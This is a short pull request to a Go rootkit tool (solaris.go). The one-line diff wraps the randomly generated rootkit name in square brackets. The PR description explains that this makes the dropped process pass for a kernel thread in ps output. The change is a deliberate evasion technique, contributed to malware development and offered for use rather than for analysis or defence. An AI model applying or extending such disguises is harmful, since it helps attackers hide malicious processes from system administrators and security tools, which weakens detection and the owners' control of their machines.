### PR TITLE
Simulate kernel thread/

### DIFF
--- a/solaris.go
+++ b/solaris.go
@@ -404,7 +404,7 @@ func main() {
 		install_headers(*kernel)
 	}
 	if *random {
-		rootkit_name = random_string(random_int(1, 10))
+		rootkit_name = "[" + random_string(random_int(1, 10)) + "]"
 	}
 	if *kernel != "local" {
 		kernel_ver = *kernel


### PR DESCRIPTION
Processes which are enclosed in square brackets (e.g. in ps aux output) are usually kernel threads/ring-0 processes.
Enclosing the name of the dropped file in square brackets will simulate this behavior.